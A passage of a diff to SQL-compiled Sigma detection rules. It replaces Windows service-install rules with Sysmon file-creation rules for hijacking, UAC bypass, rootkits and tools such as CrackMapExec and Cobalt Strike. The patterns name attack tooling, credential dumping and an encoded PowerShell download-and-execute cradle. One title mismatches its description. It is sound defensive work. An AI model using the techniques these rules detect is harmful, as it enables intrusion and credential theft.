"attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Any powershell script that creates bat files" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 
'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate administrator activity" + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects the creation of log files during a TeamViewer remote session", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate uses of TeamViewer in an organisation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN 
('150', '770', '771'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - 
"filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": 
"bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": 
"win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND 
TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE 
'%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Windows Defender Threat Detection Disabled - Service", - "id": "6c0a7755-6d31-44fa-80e1-133e57752680", - "status": "stable", - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", - "author": "Ján Trenčanský, frack113", + "title": "Dynamic CSharp Compile Artefact", + "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "status": "test", + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027.004" ], "falsepositives": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.cmdline' ESCAPE '\\')" ], - "filename": "win_system_defender_disabled.yml" + "filename": "file_event_win_csharp_compile_artefact.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", 
+ "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE 
'%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. 
Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT 
